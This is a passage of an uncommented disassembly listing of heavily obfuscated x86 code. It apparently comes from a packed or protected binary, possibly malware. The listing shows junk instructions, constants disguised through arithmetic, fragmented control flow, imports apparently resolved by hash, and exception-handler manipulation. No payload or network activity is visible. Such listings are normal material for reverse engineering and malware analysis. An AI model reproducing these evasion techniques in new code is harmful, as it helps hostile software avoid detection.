; END OF FUNCTION CHUNK FOR sub_423A56
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42284F
loc_4274EC: ; CODE XREF: sub_42284F:loc_429022�j
jz loc_42376A
jmp loc_42BEAC
; ---------------------------------------------------------------------------
loc_4274F7: ; CODE XREF: sub_429629-5E0D�j
; sub_42284F+66EB�j
mov ebp, [ecx]
loc_4274F9: ; CODE XREF: sub_429629:loc_42BA3A�j
call sub_429BC2
mov edx, 3BD2EC5Ch
push esi
jmp loc_4258D6
; END OF FUNCTION CHUNK FOR sub_42284F
; ---------------------------------------------------------------------------
call sub_422BD8
; START OF FUNCTION CHUNK FOR sub_4294B3
loc_42750E: ; CODE XREF: sub_4294B3:loc_421FC4�j
or eax, 0CC0F5BFh
add eax, 31742C12h
loc_42751A: ; CODE XREF: _94j21ax3:loc_4281FF�j
call sub_42AB72
loc_42751F: ; CODE XREF: _94j21ax3:loc_424A47�j
pop ecx
pop eax
pop ebx
mov ebp, offset loc_426485
loc_427527: ; CODE XREF: _94j21ax3:00421FAB�j
xchg ebp, [esp-0Ch+arg_8]
retn
; END OF FUNCTION CHUNK FOR sub_4294B3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4273AE
loc_42752B: ; CODE XREF: sub_4273AE+C11�j
jmp sub_4239A5
; END OF FUNCTION CHUNK FOR sub_4273AE
; ---------------------------------------------------------------------------
loc_427530: ; CODE XREF: _94j21ax3:loc_42A13E�j
adc eax, 0E60532AEh
; START OF FUNCTION CHUNK FOR sub_42284F
loc_427536: ; CODE XREF: sub_42284F:loc_42A6CD�j
cmp ebx, 75515796h
jmp loc_42AF84
; END OF FUNCTION CHUNK FOR sub_42284F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429BE2
loc_427541: ; CODE XREF: sub_429BE2+1961�j
push ds:dword_425BD0
retn
; END OF FUNCTION CHUNK FOR sub_429BE2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C0BC
loc_427548: ; CODE XREF: sub_42C0BC+2C4�j
jmp loc_428577
; END OF FUNCTION CHUNK FOR sub_42C0BC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429BE2
loc_42754D: ; CODE XREF: sub_429BE2+4�j
mov ebp, esp
call nullsub_11
push 6264E5C7h
pop eax
jmp loc_424392
; END OF FUNCTION CHUNK FOR sub_429BE2
; ---------------------------------------------------------------------------
loc_42755F: ; CODE XREF: _94j21ax3:004218EB�j
jp loc_425566
; =============== S U B R O U T I N E =======================================
sub_427565 proc near ; CODE XREF: sub_4258EB+40EB�p
; FUNCTION CHUNK AT 00422918 SIZE 00000005 BYTES
xchg edx, [esp+0]
pop edx
pop ebp
push ds:dword_42C48C
jmp loc_422918
sub_427565 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_427575: ; CODE XREF: _94j21ax3:0042B4EC�j
mov edx, 0F25CB94Fh
call sub_4239A5
push edx
mov edx, ebx
xchg edx, [esp]
jmp loc_429360
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421D33
loc_42758A: ; CODE XREF: sub_421D33:loc_42344C�j
push 0FC8F2D74h
pop eax
xor eax, 52305CE6h
add eax, ebp
add eax, 51408E52h
jmp loc_4280F0
; END OF FUNCTION CHUNK FOR sub_421D33
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_202. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424DE8
loc_4275A4: ; CODE XREF: sub_424DE8+B�j
pop ebx
push 0E20D9736h
pop eax
add eax, 1E350852h
mov eax, [eax]
or eax, eax
jnz loc_4295B0
jmp loc_422053
; END OF FUNCTION CHUNK FOR sub_424DE8
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_217. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_4275C1: ; CODE XREF: _94j21ax3:004258C6�j
jmp loc_42C1CA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425157
loc_4275C6: ; CODE XREF: sub_425157:loc_42241B�j
call sub_42B358
loc_4275CB: ; CODE XREF: _94j21ax3:0042C54B�j
jmp loc_42B8C5
; END OF FUNCTION CHUNK FOR sub_425157
; ---------------------------------------------------------------------------
loc_4275D0: ; CODE XREF: _94j21ax3:0042C3E8�j
jmp loc_425847
; ---------------------------------------------------------------------------
loc_4275D5: ; CODE XREF: _94j21ax3:00427190�j
jmp loc_424488
; ---------------------------------------------------------------------------
locret_4275DA: ; CODE XREF: _94j21ax3:loc_426542�j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C1AE
loc_4275DB: ; CODE XREF: sub_42C1AE:loc_42C228�j
cmp eax, 80000000h
jbe loc_423047
jmp loc_421F65
; END OF FUNCTION CHUNK FOR sub_42C1AE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428DA6
loc_4275EB: ; CODE XREF: sub_428DA6+B�j
mov al, [ebp-0Bh]
mov ecx, 8
loc_4275F3: ; CODE XREF: _94j21ax3:loc_422DCC�j
; _94j21ax3:loc_42A03E�j
sub ecx, eax
xor eax, eax
mov al, [ebp-9]
shl eax, cl
push offset sub_423900
jmp loc_42A4CD
; END OF FUNCTION CHUNK FOR sub_428DA6
; ---------------------------------------------------------------------------
test ecx, ebp
jmp loc_42C331
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_171. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427ABD
loc_42760E: ; CODE XREF: sub_427ABD+3C2F�j
jmp loc_42BAF2
; END OF FUNCTION CHUNK FOR sub_427ABD
; ---------------------------------------------------------------------------
loc_427613: ; CODE XREF: _94j21ax3:0042673E�j
jmp locret_4233A8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429862
loc_427618: ; CODE XREF: sub_429862-21FF�j
js loc_421D14
add eax, 0C3587632h
and edi, 0C6138F24h
jbe loc_427D57
cmp esi, 9DA50BC4h
; END OF FUNCTION CHUNK FOR sub_429862
; START OF FUNCTION CHUNK FOR sub_422EB0
loc_427636: ; CODE XREF: sub_422EB0+D2�j
jmp loc_4218B3
; END OF FUNCTION CHUNK FOR sub_422EB0
; =============== S U B R O U T I N E =======================================
sub_42763B proc near ; DATA XREF: _94j21ax3:0042B69C�o
xchg ebx, edi
push edi
xchg ebx, edi
push offset sub_42AE5A
jmp nullsub_224
sub_42763B endp
; ---------------------------------------------------------------------------
loc_42764A: ; CODE XREF: _94j21ax3:00426B5E�j
mov [ebx], ebp
; =============== S U B R O U T I N E =======================================
sub_42764C proc near ; CODE XREF: sub_421D33+490A�p
; FUNCTION CHUNK AT 00428FC4 SIZE 00000004 BYTES
; FUNCTION CHUNK AT 0042A1B5 SIZE 00000005 BYTES
xchg ebx, [esp+0]
pop ebx
mov eax, [ebp-20h]
call sub_422790
jmp loc_42A1B5
sub_42764C endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429862
loc_42765D: ; CODE XREF: sub_429862-6E72�j
test ebp, 0AD975D4Ah
jmp loc_427618
; END OF FUNCTION CHUNK FOR sub_429862
; =============== S U B R O U T I N E =======================================
sub_427668 proc near ; DATA XREF: sub_42284F+D2C�o
; FUNCTION CHUNK AT 004244F1 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004271E0 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00427EE5 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00429109 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042A8AF SIZE 0000000B BYTES
cmp dword ptr [eax], 47424454h
jz loc_42A566
jmp loc_429109
sub_427668 endp
; =============== S U B R O U T I N E =======================================
sub_427679 proc near ; CODE XREF: _94j21ax3:00422A42�j
; _94j21ax3:00423C34�p
; FUNCTION CHUNK AT 00422EE5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004266B4 SIZE 00000006 BYTES
mov [esp+0], eax
pop eax
shr edx, 3
mov ecx, ds:dword_429F74
jmp loc_422EE5
sub_427679 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
test al, al
jz loc_42669A
jmp loc_428712
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4272E9
loc_427698: ; CODE XREF: sub_4272E9:loc_4232E5�j
add ebp, 62509CFBh
jmp loc_42C26D
; END OF FUNCTION CHUNK FOR sub_4272E9
; =============== S U B R O U T I N E =======================================
sub_4276A3 proc near ; CODE XREF: sub_4272E9-5D9B�p
; _94j21ax3:00427178�j
; FUNCTION CHUNK AT 004215F0 SIZE 00000005 BYTES
mov [esp+0], esi
pop esi
or eax, eax
jnz loc_42ADE8
jmp loc_4215F0
sub_4276A3 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
js loc_42A410
jmp sub_4221A3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427D15
loc_4276BF: ; CODE XREF: sub_427D15+D�j
cmp ds:dword_426F44, 0
jnz loc_42B891
lea edx, [ebp-14h]
mov eax, offset dword_426F48
call sub_428AE1
lea eax, [ebp-14h]
push eax
jmp loc_424EC3
; END OF FUNCTION CHUNK FOR sub_427D15
; ---------------------------------------------------------------------------
loc_4276E2: ; DATA XREF: sub_422CC1+8�o
push 0CC743787h
mov [esp], ecx
mov esp, ebp
pop ebp
mov eax, ds:dword_423428
or eax, eax
jmp loc_424364
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424775
loc_4276FA: ; CODE XREF: sub_424775+2306�j
pop edx
or edx, 5DECE416h
xor edx, 3C40C789h
call sub_4287BF
loc_42770C: ; CODE XREF: sub_4232F5+6789�j
jmp loc_42C188
; END OF FUNCTION CHUNK FOR sub_424775
; ---------------------------------------------------------------------------
loc_427711: ; CODE XREF: _94j21ax3:004257E8�j
jmp loc_42B57F
; ---------------------------------------------------------------------------
loc_427716: ; CODE XREF: _94j21ax3:0042BCE9�j
and edx, 2E2CACA8h
; =============== S U B R O U T I N E =======================================
sub_42771C proc near ; CODE XREF: sub_426716+4�p
; FUNCTION CHUNK AT 00421BBE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004231D7 SIZE 0000000A BYTES
xchg edi, [esp+0]
pop edi
mov esp, ebp
jmp loc_421BBE
sub_42771C endp ; sp-analysis failed
; ---------------------------------------------------------------------------
adc ebp, 18931805h
jmp sub_422034
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423324
loc_427732: ; CODE XREF: sub_423324-12FB�j
call sub_428180
loc_427737: ; CODE XREF: sub_424C37-B4E�j
jmp loc_425642
; END OF FUNCTION CHUNK FOR sub_423324
; =============== S U B R O U T I N E =======================================
sub_42773C proc near ; CODE XREF: sub_42284F:loc_4224A2�j
; _94j21ax3:0042B195�j ...
; FUNCTION CHUNK AT 004266EB SIZE 00000006 BYTES
; FUNCTION CHUNK AT 004294D9 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0042A016 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0042A3A2 SIZE 0000001B BYTES
xchg edx, [esp+0]
pop edx
mov eax, [ebp+8]
cmp dword ptr [eax-1Ch], 0F6h
jz loc_42A3A2
mov eax, [ebp+8]
cmp dword ptr [eax-1Ch], 0F7h
jmp loc_4294D9
sub_42773C endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A0CC
loc_42775F: ; CODE XREF: sub_42A0CC:loc_4293E0�j
adc edi, ecx
jmp loc_42346A
; END OF FUNCTION CHUNK FOR sub_42A0CC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423C51
loc_427766: ; CODE XREF: sub_423C51:loc_421AEE�j
add eax, [ebp-4]
push offset loc_4233D8
jmp loc_423822
; END OF FUNCTION CHUNK FOR sub_423C51
; =============== S U B R O U T I N E =======================================
sub_427773 proc near ; DATA XREF: _94j21ax3:loc_42AFB2�o
mov edx, 0A22F8A70h
call sub_422048
mov ds:dword_426F2C, eax
call sub_42574E
mov edx, 0A2CD59D9h
call sub_422048
mov ds:dword_425BD0, eax
retn
sub_427773 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4281A5
loc_427797: ; CODE XREF: sub_4281A5+2808�j
push 7693CA35h
loc_42779C: ; CODE XREF: sub_4281A5:loc_429959�j
pop large dword ptr fs:0
call sub_42B052
loc_4277A8: ; CODE XREF: sub_42678A+1F�j
or ecx, ecx
jz loc_42933E
mov ebx, [ebx+ecx]
jmp loc_428FF1
; END OF FUNCTION CHUNK FOR sub_4281A5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42678A
loc_4277B8: ; CODE XREF: sub_42678A:loc_427DD9�j
add edx, 14h
mov ecx, [ebx+edx-8]
or ecx, ecx
jmp loc_4238E4
; END OF FUNCTION CHUNK FOR sub_42678A
; ---------------------------------------------------------------------------
loc_4277C6: ; CODE XREF: _94j21ax3:loc_423184�j
call sub_4239A5
push offset loc_4272AC
jmp locret_42362C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426716
loc_4277D5: ; CODE XREF: _94j21ax3:0042448E�j
; sub_426716+10�j
popf
and edi, ebp
loc_4277D8: ; CODE XREF: _94j21ax3:00422E1E�j
jmp loc_428EED
; END OF FUNCTION CHUNK FOR sub_426716
; ---------------------------------------------------------------------------
jnb loc_4284DA
jmp sub_42A4DC
; ---------------------------------------------------------------------------
loc_4277E8: ; DATA XREF: sub_422B12+A�o
push 3A1F1A61h
pop ecx
add ecx, 0C623261Fh
mov [ecx], eax
pop ecx
jmp loc_421096
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
loc_4277FD: ; CODE XREF: _94j21ax3:00423FC1�j
push offset sub_4238D1
jmp locret_424F87
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423F55
loc_427807: ; CODE XREF: sub_423F55:loc_4246A9�j
mov [ebp-8], eax
jmp loc_426694
; END OF FUNCTION CHUNK FOR sub_423F55
; =============== S U B R O U T I N E =======================================
sub_42780F proc near ; CODE XREF: sub_426A83-47CA�p
; sub_422B4F+B�p ...
; FUNCTION CHUNK AT 00423105 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00423585 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 00424570 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042ACCA SIZE 0000000F BYTES
jz sub_426BA2
push ebp
mov ebp, esp
push ecx
cmp ds:dword_42C4A4, 0
jnz loc_42ACCA
jmp loc_423105
sub_42780F endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42848B
loc_42782B: ; CODE XREF: sub_42848B-7201�j
rol eax, 4
loc_42782E: ; CODE XREF: sub_4221B8:loc_427F89�j
call sub_42B075
loc_427833: ; CODE XREF: sub_4286DC+3�j
jmp sub_4239A5
; END OF FUNCTION CHUNK FOR sub_42848B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425A09
loc_427838: ; CODE XREF: sub_425A09+9�j
jmp loc_422840
; END OF FUNCTION CHUNK FOR sub_425A09
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_160. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421D33
loc_42783E: ; CODE XREF: sub_421D33+76A�j
jz loc_42AB21
jmp loc_425949
; END OF FUNCTION CHUNK FOR sub_421D33
; =============== S U B R O U T I N E =======================================
sub_427849 proc near ; DATA XREF: sub_4225B5+3�o
; FUNCTION CHUNK AT 0042207B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00422D11 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 004237A8 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00423802 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00423E39 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004252B5 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00428B97 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00429F95 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0042A598 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042B41A SIZE 00000015 BYTES
add esp, 0FFFFFFF8h
mov [ebp-4], eax
loc_42784F: ; CODE XREF: sub_427849-2591�j
jno loc_429FA0
mov eax, [ebp-4]
movzx eax, byte ptr [eax]
cmp ds:dword_425BD4[eax*4], 0
jz loc_4252B5
jmp loc_422D11
sub_427849 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423324
loc_42786E: ; CODE XREF: sub_423324+579E�j
push edi
and ecx, edi
loc_427871: ; CODE XREF: sub_423324:loc_4220E5�j
push edx
push 9EEB4BB5h
pop edx
add edx, 615726CFh
xchg edx, [esp+0]
jmp sub_422973
; END OF FUNCTION CHUNK FOR sub_423324
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428180
loc_427886: ; CODE XREF: sub_428180:loc_42818F�j
mov esp, ebp
pop ebp
push ds:dword_42C4A4
retn
; END OF FUNCTION CHUNK FOR sub_428180
; ---------------------------------------------------------------------------
loc_427890: ; CODE XREF: _94j21ax3:004264D7�j
jmp locret_424D0C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421047
loc_427895: ; CODE XREF: sub_421047+6E4F�j
; sub_42BAD4:loc_4286AC�j
mov eax, [ebp-1Ch]
mov al, [eax]
mov edx, [ebp-20h]
jmp loc_42A8E4
; END OF FUNCTION CHUNK FOR sub_421047
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426AFD
loc_4278A2: ; CODE XREF: sub_426AFD+17�j
add ecx, 88C63587h
xchg ecx, [esp+0]
jmp sub_42C057
; END OF FUNCTION CHUNK FOR sub_426AFD
; ---------------------------------------------------------------------------
loc_4278B0: ; CODE XREF: _94j21ax3:0042360F�j
call sub_4239A5
push eax
ror eax, 16h
push esi
push 0E9DA91ACh
jmp loc_423100
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421402
loc_4278C4: ; CODE XREF: sub_421402:loc_4214BB�j
xchg edi, [esp+18h+var_18]
lea eax, [ebp-400h]
push eax
push edi
push 5E8E2F4Fh
pop edi
or edi, 8EF6BDF9h
jmp loc_423794
; END OF FUNCTION CHUNK FOR sub_421402
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_15. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42ADA2
loc_4278E1: ; CODE XREF: sub_42ADA2-BFD�j
jmp loc_42BB45
; END OF FUNCTION CHUNK FOR sub_42ADA2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429629
loc_4278E6: ; CODE XREF: sub_429629:loc_428B24�j
and edi, eax
mov ebp, edx
jmp loc_426AE0
; END OF FUNCTION CHUNK FOR sub_429629
; ---------------------------------------------------------------------------
call sub_42ADD6
loc_4278F4: ; CODE XREF: _94j21ax3:0042723D�j
jbe loc_42BE88
jge loc_424AB1
jmp sub_4291BC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421F28
loc_427905: ; CODE XREF: sub_421F28+8E8F�j
jl loc_42690F
; END OF FUNCTION CHUNK FOR sub_421F28
; START OF FUNCTION CHUNK FOR sub_4294B3
loc_42790B: ; CODE XREF: sub_4294B3:loc_42847A�j
mov ebx, ebp
; END OF FUNCTION CHUNK FOR sub_4294B3
; START OF FUNCTION CHUNK FOR sub_421F28
loc_42790D: ; CODE XREF: sub_421F28:loc_42702F�j
call sub_4210AA
mov edx, 9E99B23Eh
call sub_4239A5
call sub_422B12
loc_427921: ; CODE XREF: sub_423FCD+4262�j
jmp loc_4291FA
; END OF FUNCTION CHUNK FOR sub_421F28
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425934
loc_427926: ; CODE XREF: sub_425934-3D43�j
jmp loc_42C239
; END OF FUNCTION CHUNK FOR sub_425934
; ---------------------------------------------------------------------------
loc_42792B: ; CODE XREF: _94j21ax3:00429A5C�j
js loc_42A547
adc edx, 0B080ECDCh
and esi, 0B9D2A169h
jmp loc_421B11
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424775
loc_427942: ; CODE XREF: sub_424775+17�j
pop eax
add eax, 0D46BB688h
call sub_42B9E8
mov [ebp-8], eax
push 400h
mov eax, [ebp-8]
push eax
jmp loc_42691A
; END OF FUNCTION CHUNK FOR sub_424775
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424839
loc_42795F: ; CODE XREF: sub_424839+54EC�j
mov ebp, [ecx]
xchg ebx, [ebp+0]
sub edi, ebx
jmp loc_4245C0
; END OF FUNCTION CHUNK FOR sub_424839
; ---------------------------------------------------------------------------
loc_42796B: ; DATA XREF: sub_421EAD+6�o
mov [ebp-4], eax
mov eax, [ebp-4]
mov [ebp-0Ch], eax
xor eax, eax
mov [ebp-8], eax
loc_427979: ; CODE XREF: _94j21ax3:00425749�j
js loc_427E72
mov eax, [ebp-0Ch]
cmp byte ptr [eax], 0
jmp loc_42367E
; ---------------------------------------------------------------------------
loc_42798A: ; CODE XREF: _94j21ax3:00429E7E�j
add ebx, 0A65FB7ECh
xchg ebx, ecx
; START OF FUNCTION CHUNK FOR sub_422764
loc_427992: ; CODE XREF: sub_422764:loc_429E69�j
rol ebx, 0Ah
xor ebx, 0E021441h
jmp loc_42C3C6
; END OF FUNCTION CHUNK FOR sub_422764
; =============== S U B R O U T I N E =======================================
sub_4279A0 proc near ; DATA XREF: sub_425758+1�o
xchg ecx, [esp+0]
mov ebp, ecx
pop ecx
jmp loc_426485
sub_4279A0 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
push ebp
jmp loc_427131
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4272E9
loc_4279B1: ; CODE XREF: sub_4272E9:loc_4297BA�j
jnz loc_4246EA
jmp loc_4210DD
; END OF FUNCTION CHUNK FOR sub_4272E9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42454E
loc_4279BC: ; CODE XREF: sub_42454E+721F�j
pop edi
sub edi, 77EFE14h
jns loc_422EEC
pop ebp
cdq
jmp loc_422EEA
; END OF FUNCTION CHUNK FOR sub_42454E
; ---------------------------------------------------------------------------
shl edx, 1
jmp sub_4250D0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421330
loc_4279D7: ; CODE XREF: sub_421330:loc_4227F0�j
call sub_42BA8A
lea eax, [ebp-0Ch]
push edx
mov [esp+4+var_4], eax
mov eax, [ebp-8]
call sub_42B487
; END OF FUNCTION CHUNK FOR sub_421330
; START OF FUNCTION CHUNK FOR sub_423BBD
loc_4279EB: ; CODE XREF: sub_423BBD+D�j
jmp sub_42574E
; END OF FUNCTION CHUNK FOR sub_423BBD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4228FF
loc_4279F0: ; CODE XREF: sub_4228FF:loc_424588�j
mov byte ptr [eax], 0
mov esp, ebp
push offset sub_42843C
jmp loc_42433A
; END OF FUNCTION CHUNK FOR sub_4228FF
; ---------------------------------------------------------------------------
loc_4279FF: ; DATA XREF: sub_421A4F+49D1�o
call sub_42574E
mov edx, 7DA6ACC0h
push edx
push 2C396784h
jmp loc_4266F1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429862
loc_427A14: ; CODE XREF: sub_429862:loc_4245C6�j
cmp dword ptr [eax-0Ch], 4
jnz loc_422787
push offset loc_42277E
jmp loc_425BB9
; END OF FUNCTION CHUNK FOR sub_429862
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4229FB
loc_427A28: ; CODE XREF: sub_4229FB+A�j
or ecx, 4217D8BCh
and ecx, 0F1692B73h
add ecx, 8FE171D1h
xchg ecx, [esp-4+arg_0]
jmp sub_42574E
; END OF FUNCTION CHUNK FOR sub_4229FB
; ---------------------------------------------------------------------------
mov edx, 0F2B89A19h
call sub_4239A5
push eax
ror eax, 0Dh
jmp loc_42B2DC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AE5A
loc_427A55: ; CODE XREF: sub_42AE5A:loc_425FD4�j
xor edi, 0F38499DFh
sub ecx, edi
pop edi
call sub_42445A
; END OF FUNCTION CHUNK FOR sub_42AE5A
; START OF FUNCTION CHUNK FOR sub_423717
loc_427A63: ; CODE XREF: sub_423717-1A35�j
jmp loc_423727
; END OF FUNCTION CHUNK FOR sub_423717
; =============== S U B R O U T I N E =======================================
sub_427A68 proc near ; DATA XREF: sub_422A20+4A8C�o
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00421A16 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00422F66 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00424071 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00424303 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 004246D5 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0042A741 SIZE 0000000F BYTES
push 979D2561h
loc_427A6D: ; CODE XREF: sub_42C1AE:loc_425896�j
add [esp+4+var_4], 68ADF725h
pushf
push 54009859h
pop eax
xor eax, 695742CEh
add eax, ebp
jmp loc_424071
sub_427A68 endp
; ---------------------------------------------------------------------------
xor esi, ebp
jmp loc_42221D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A9E7
loc_427A8F: ; CODE XREF: sub_42A9E7+8�j
mov esp, ebp
pop ebp
mov eax, ds:dword_423418
or eax, eax
loc_427A9A: ; CODE XREF: sub_4294B3:loc_4299A5�j
jnz loc_427FED
jmp loc_4225FE
; END OF FUNCTION CHUNK FOR sub_42A9E7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B9CF
loc_427AA5: ; CODE XREF: sub_42B9CF-2C8D�j
test al, al
jz nullsub_86
call sub_427ABD
retn
; END OF FUNCTION CHUNK FOR sub_42B9CF
; ---------------------------------------------------------------------------
loc_427AB3: ; CODE XREF: _94j21ax3:0042C076�j
jmp loc_42B79E
; ---------------------------------------------------------------------------
loc_427AB8: ; CODE XREF: _94j21ax3:00428D76�j
jmp loc_42576C
; =============== S U B R O U T I N E =======================================
sub_427ABD proc near ; CODE XREF: sub_4272E9:loc_425144�p
; sub_42B9CF-3F22�p
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00422BA6 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0042760E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042A06C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042B6DF SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0042BAF2 SIZE 0000000B BYTES
jz loc_422BA6
loc_427AC3: ; CODE XREF: sub_423FCD:loc_4291CF�j
mov eax, offset byte_4256A8
jmp loc_42A06C
sub_427ABD endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_422EB0
loc_427ACD: ; CODE XREF: sub_422EB0-1BF0�j
test ebx, ebp
jmp loc_42813D
; END OF FUNCTION CHUNK FOR sub_422EB0
; ---------------------------------------------------------------------------
loc_427AD4: ; CODE XREF: _94j21ax3:loc_4257E2�j
; _94j21ax3:0042B58C�j
push 21834123h
pop eax
or eax, 2D9729E6h
and eax, 0A7BD6487h
jmp loc_42A5F1
; =============== S U B R O U T I N E =======================================
sub_427AEB proc near ; CODE XREF: sub_427D03+3�p
; _94j21ax3:0042948E�j
; FUNCTION CHUNK AT 004211AE SIZE 0000001F BYTES
; FUNCTION CHUNK AT 00422DC2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042AED9 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0042C33E SIZE 0000000A BYTES
mov [esp+0], esi
pop esi
or dword ptr [eax-8], 8
jmp loc_42AED9
sub_427AEB endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42484C
loc_427AF8: ; CODE XREF: sub_42484C+361B�j
; sub_42B3E4+4�j
js loc_42736B
jmp loc_429CD7
; END OF FUNCTION CHUNK FOR sub_42484C
; ---------------------------------------------------------------------------
locret_427B03: ; CODE XREF: _94j21ax3:loc_428AA3�j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42BEDC
loc_427B04: ; CODE XREF: sub_42BEDC+19�j
jmp loc_425A4A
; END OF FUNCTION CHUNK FOR sub_42BEDC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C0BC
loc_427B09: ; CODE XREF: sub_42C0BC-504�j
jnz loc_421A31
jmp loc_428195
; END OF FUNCTION CHUNK FOR sub_42C0BC
; ---------------------------------------------------------------------------
loc_427B14: ; DATA XREF: sub_421644:loc_421901�o
push 0
; START OF FUNCTION CHUNK FOR sub_4272E9
loc_427B16: ; CODE XREF: sub_4272E9:loc_426DF2�j
mov edx, esp
push edx
push 85B185D2h
add dword ptr [esp+0], 7A4E7A2Eh
jmp loc_428ADC
; END OF FUNCTION CHUNK FOR sub_4272E9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_422AD5
loc_427B2A: ; CODE XREF: sub_422AD5:loc_42110F�j
add esi, 0A85ECD13h
jmp loc_4264C2
; END OF FUNCTION CHUNK FOR sub_422AD5
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
